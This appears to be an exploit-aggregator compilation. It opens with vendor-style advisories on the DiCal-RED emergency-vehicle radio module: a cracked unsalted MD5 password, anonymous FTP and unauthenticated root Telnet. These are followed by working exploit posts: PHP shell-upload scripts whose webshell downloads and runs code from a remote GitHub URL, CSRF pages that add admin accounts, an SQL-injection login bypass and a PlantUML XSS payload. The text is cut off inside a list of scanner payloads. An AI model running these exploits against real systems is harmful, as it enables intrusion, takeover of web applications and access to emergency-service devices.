DiCal-RED version 4009 has a password that is stored in the file /etc/deviceconfig as a plain MD5 hash, i.e. without any salt or computational cost function.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-037  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Use of Password Hash With Insufficient Computational Effort (CWE-916)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36440  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to a weak password hashing function, the device password is vulnerable to  
offline brute-force attacks in order to recover the password.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device password is stored in the file /etc/deviceconfig as a plain MD5  
hash, i.e. without any salt or computational cost function.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

root@DiCal-RED:~# cat /etc/deviceconfig  
PasswordActive=1  
PasswordHash="2ab96390c7dbe3439de74d0c9b0b1767"  
[...]

$ hashcat -m 0 -a 3 2ab96390c7dbe3439de74d0c9b0b1767 ?l?l?l?l?l?l?d  
[...]  
2ab96390c7dbe3439de74d0c9b0b1767:hunter2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-037  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-037.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5YLLw/+KOVlJj9SE7BMWl9H9zO9YcNZPUvuC62/iAtn82r0bOTQAUjx3eSzxx01  
BGqHEVozMOb4PHC1hTPGp+WHMaFNlcLgiyciFhckh4PpeIwtCCccg3+8BlJRmVPb  
pO+IWo16KcW/fYnqpu5fvHeKnC7UkauWBJiC5a72kjBqJeKreHjTJ3+lAOuMp5nt  
wTJAEVvlog+MNJzXipMTDzYlaw6YrMr5ukgou0iDKKNJpwMBwJpga0IvJGmubNOU  
YchVnsZOC7cXWqPBRFpNzKJifMZJ2rWPzoryIniR+ZdJn/M/wXr4IKZZJ0Oag/UT  
li1LdUlNby7QnPCB9T0TfAhS3uGn9tSulPG51Ei9COuKFcpGWqEBM+NZ5QHy/+7o  
6uo8tHV34XV4ztsWWHp6Mjd9qDI/7iPFsSR4k+Zio5/5rPqOfhp2LuBFfnuLCuqY  
RLZnZ+eDuyUk4fsDLPP/2mRjfVf9+dskYBVqGbgjzNvgb2teTBxD3t31cdgyRNc7  
LurHmE4h+h+qLT78E2i/iuRyvZFzAQ6miDNgFqDoTrp9XENtXSicmy0ABMPGMjCw  
jg0dzFT4AA7zhNN0HuPNX2fE0+dmy5g9t8HdNFJeG52uTMs6/CYGlu573oErlUru  
lr2Y2f3O06EHFnrR05OVM4TXuQF5VF5lHY/WmTCsOTWOYED2pjg=  
=tMX8  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Weak Hashing 

DiCal-RED version 4009 provides an FTP service on TCP port 21. This service allows anonymous access, i.e. logging in as the user "anonymous" with an arbitrary password. Anonymous users get read access to the whole file system of the device, including files that contain sensitive configuration information, such as /etc/deviceconfig. The respective process on the system runs as the system user "ftp". Therefore, a few files with restrictive permissions are not accessible via FTP.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-036  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Missing Authentication for Critical Function (CWE-306)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36443  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to anonymous FTP access, the device is vulnerable to the disclosure of  
sensitive information, such as the device password's hash.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device provides an FTP service on TCP port 21. This service allows  
anonymous access, i.e. logging in as the user "anonymous" with an arbitrary  
password. Anonymous users get read access to the whole file system of the  
device, including files that contain sensitive configuration information, such  
as /etc/deviceconfig.  
The respective process on the system runs as the system user "ftp". Therefore,  
a few files with restrictive permissions are not accessible via FTP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

$ ftp <IP or hostname>  
220 ProFTPD 1.3.3g Server (ProFTPD) [192.0.2.1]  
500 OPTS UTF8 not understood  
User (<IP or hostname>:(none)): anonymous  
331 Anonymous login ok, send your complete email address as your password  
Password:  
230 Anonymous access granted, restrictions apply  
ftp> ls  
200 PORT command successful  
150 Opening ASCII mode data connection for file list  
usb2  
mnt  
etc  
dev  
proc  
lib  
home  
htdocs  
sbin  
media  
ram  
linuxrc  
root  
gprscfg  
run  
usr  
usb1  
lost+found  
bin  
tmp  
sys  
var  
226 Transfer complete

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-036  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-036.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5bypA/8CtRcEEdS48fPfKJRheIMG5qdEBv3Rq8rljg+PqkoqeL6G6ztRYQkbcaX  
Tl1+ajtOW3rPM9i9AExV6UIPG9IO+IY0v4vto1uHALZ7gkVeOe0bQXov0Lgbwr/y  
dWrpv4tMFNo48pDZEU9bl1+fb6VtPoiF2QPyjvylpiMe1ONrUpxqkd5HsNkAw2V7  
90X+Ma/+awXITwwTL/7iX6ryCvSZjN72wd1m1S9tcrQ0+/dUnoIZCDWNnLMSroUq  
GoqxotzUD0ehDxSrKUG4eXY1yGjJcIRSjAspYfNCdOnzHmW3XgrgCkFoDHnB8RTv  
bhL+uwxu99eQMkyrhPBZ34hGmRjIDpywbnrG6iX3+1pBiIslQQ/u3BYDdpYx3MJE  
Rv0HX+qrHQxPFphb+ZvPO/LHJApwgmjvS81OutAnbAblOnBpapjcBN729Sd5B0Sn  
x+MdUZOGQGEPKCXkBnHh7Dpt4zUlM8lmFALNhk2dW+eioZhC3RaYXc8GmcB7QyFo  
OjyCcsP1yMjN2ITfw1Jg2NfPQ/o05RoWRAxa/zDepW4T4wDGguTyZCNdxsHAH3bV  
2BtVF+jLOBhlf3/63RCzrRbiOIwKv6qkjjp5ymWwuALFaklpcjzFbx1Rwv9cl0Wy  
8wbJBa6BgJOcAO0ODR+GyPCn79ZhvY6w9SqmXM9rWcVQb3Rz1Yk=  
=lCcl  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Missing Authentication

DiCal-RED version 4009 provides a Telnet service on TCP port 23. This service grants access to an interactive shell as the system's root user and does not require authentication.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-035  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Missing Authentication for Critical Function (CWE-306)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36445  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to missing authentication checks, the device is vulnerable to remote code  
execution as root.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device provides a Telnet service on TCP port 23. This service grants  
access to an interactive shell as the system's root user and does not require  
authentication.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

$ telnet <IP or hostname>  
root@DiCal-RED:~# id  
uid=0(root) gid=0(root) groups=0(root)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-035  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-035.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5a+RA//U6KMckje2e155lbDDv0WKneeJ6Csa/DIjLVibgavlbtaXQwkV1AkRFUm  
waN/PLm5nI6Ish3jssLT86Y6HJxaosbijdPuUT5pPfcrvMl0Hh0qvEblAkXxK0VE  
CcfQeiiAsWeHxMpOp2a3P1qHk8TM1aoqsc+IQlZwO1QBCfKP6kXiuJE2tqjKcevf  
nl3O9MQ3x+gDpzQfVndbUWT8eTwnZ0tmL6a6xCbOznqnFuOpIpINbvy9p3Yn2PWe  
F4o2BOIxB+r8jOChSewBPXIzx+qJbunT3x/lhBj764a7qxnIdgN+Bvyl1dTC3l+g  
LvdKNDoRsmRVkZJtkRHVjGeEzoEus15DlWYqZcRKxSjQC24Cp2KYM5bGTM1jTDbE  
AZF6Ax/ECPRkU4HnP4HVHDYokY9Xl2sidFpRikCyAGEQsrKFgN9+ncqqg18kfWEX  
dWWVybcDKZ2DqgGYomVWS9CWRaG/TWZbW9Ys1Yo3WYs8BRbMYzPVJGsZsj7UI7Bu  
SrBkCvwXZVw6moQfl90dlLp56Ri3z8KVaiexHjYrFez84LoXm98M6/Ea4HIaf8HP  
ZrF6NPsAG+BNLR8kq8Ad3a1GbT7GJgecxt2pSEVpYAFS0131gAL/EEDWKYli6G81  
f10KSC5fLBiVO2zQCIDvymmhbgpLSlF+s4llHXlrcOG2oVGkEBI=  
=3bUQ  
-----END PGP SIGNATURE-----

PlantUML version 1.2024.6 suffers from a cross site scripting vulnerability.

    #Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)#Date: 23/08/2024#Exploit Author: Hosein Vita#Vendor Homepage: https://plantuml.com/#Version: 1.2024.6#Tested on: LinuxDescription:This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.Proof of Concept:plantumlCopy code@startumldigraph G {  graph [bgcolor="white"];  node [shape=box, style="rounded,filled", color="white"];  heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];}@endumlAlternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:Copy codePK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_VThis proof-of-concept remains stored and can be shared as a link with potential victims.

PlantUML 1.2024.6 Cross Site Scripting

Crime Complaints Reporting Management System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Crime Complaints Reporting Management System 1.0 code injection Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php target.com[+] payload :<?phpfunction file_upload($website) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(      'action' => '',        'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',        'contact' => '00213771818860',        'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'about' => 'Hacked By Indoushka',        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$website/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $website/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <website URL>\n";    echo "(+) Example: php " . $argv[0] . " http://example.com\n";    exit(-1);}$website = $argv[1];file_upload($website);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Crime Complaints Reporting Management System 1.0 Shell Upload

Courier Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Courier Management System 1.0 CSRF add admin Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 6.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/courier/ajax.php?action=save_user", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"email\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Courier Management System 1.0 Cross Site Request Forgery

Company Visitor Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Company Visitor Management 1.0 Auth By Pass Vulnerability                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/04/Company-Visitor-Management-System-PHP.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/cvms/index.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Company Visitor Management 1.0 SQL Injection

CMSsite version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : CMSsite 1.0 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://github.com/VictorAlagwu/CMSsite/archive/master.zip                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 31    Line 40  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'create_post' => '',        'post_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'post_title' => 'inouva',        'post_category_id' => '123',        'post_tags' => '99',        'post_content' => 'N0_name',        'post_status' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/CMSsite-master/admin/posts.php?source=add_post");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/CMSsite-master/img/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/CMSsite-master/img/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CMSsite 1.0 Shell Upload

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

=============================================================================================================================================  
| # Title     : CMS RIMI v1.3 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://github.com/myroot593/RIMICMS                                                                                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Profile User Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
          
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required>

          
        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required>

          
        <label for="confirm_password">Confirm Password:</label>  
        <input type="password" id="confirm_password" name="confirm_password" required>

          
        <label for="nama">Nama:</label>  
        <input type="text" id="nama" name="nama" required>

          
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required>

          
        <input type="hidden" name="id" value="">

          
        <button type="submit">Submit</button>  
    </form>  
</body>  
</html>

------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------

[+] Go to the line 3.

[+] Set the target site link Save changes and apply .

[+] Your file : 127.0.0.1/cmsrimi/content 

[+] save code as poc.html .

<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
  <div class="form-group ">  
      <label>Judul :</label>  
      <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
      <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group ">  
    <label>Isi Berita :</label>  
    <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
    <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group">  
    <label>Kategori Berita :</label>  
    <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a 